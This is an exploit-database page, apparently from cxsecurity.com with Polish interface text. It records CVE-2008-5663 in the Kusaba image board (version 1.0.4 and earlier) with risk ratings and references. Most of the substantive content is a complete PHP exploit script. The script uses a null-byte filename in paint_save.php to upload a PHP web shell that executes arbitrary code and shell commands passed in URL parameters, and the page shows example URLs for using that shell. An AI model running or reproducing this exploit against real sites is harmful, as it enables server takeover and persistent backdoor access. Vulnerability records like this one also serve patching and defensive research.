Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Kusaba <= 1.0.4 Remote Code Execution Exploit
2008.12.21
Credit:
Sausage
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2008-5663
CWE:
CWE-20
Ogólna skala CVSS:
9/10
Znaczenie:
10/10
Łatwość wykorzystania:
8/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Jednorazowa
Wpływ na poufność:
Pełny
Wpływ na integralność:
Pełny
Wpływ na dostępność:
Pełny
<?php /********************************** 9 Oct 2008 Kusaba <= 1.0.4 Remote Code Execution Sausage <tehsausage@gmail.com> After execution: http://www.kusaba.image.board/url/kasubaoek/oekaki.php?pc=print "Hello"; http://www.kusaba.image.board/url/kasubaoek/oekaki.php?sc=echo Hello **********************************/ $shellname = 'oekaki.php'; // any filename ending in php $server = 'http://www.kusaba.image.board/url/'; // BBS website, with trailing slash $image = file_get_contents('test.jpg'); // image to upload (any valid picture) $magicquotes = true; if ($magicquotes) { $shellcode = <<<endSHELL <?php isset(\$_GET['pc'])?(eval(urldecode(stripslashes(\$_GET['pc'])))):(isset(\$_GET['sc'])?(passthru(urldecode(stripslashes(\$_GET['sc'])))):(header('Location: ../'))); endSHELL; } else { $shellcode = <<<endSHELL <?php isset(\$_GET['pc'])?(eval(urldecode(\$_GET['pc']))):(isset(\$_GET['sc'])?(passthru(urldecode(\$_GET['sc']))):(header('Location: ../'))); endSHELL; } $adata = array( 'No clue' => 'what this is for', ); function build_data($adata) { $data = ''; foreach ($adata as $k => $v) { $data .= "$k=$v;"; } return substr($data,0,-1); } function data_len($data) { return str_pad(strlen($data),8,'0',STR_PAD_LEFT); } $request = new HttpRequest($server.'paint_save.php?applet=shipainter&saveid='.$shellname.'%00',HttpRequest::METH_POST); $data = build_data($adata); $imagedata = $image; $animationdata = $shellcode; $request->setRawPostData("S".data_len($data).$data.data_len($imagedata).'xx'.$imagedata.data_len($animationdata).$animationdata); echo $request->send()->getBody();
Referencje:
http://xforce.iss.net/xforce/xfdb/45794
http://xforce.iss.net/xforce/xfdb/45793
http://www.securityfocus.com/bid/31685
http://www.securityfocus.com/bid/31668
http://www.milw0rm.com/exploits/6711
http://www.milw0rm.com/exploits/6706
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top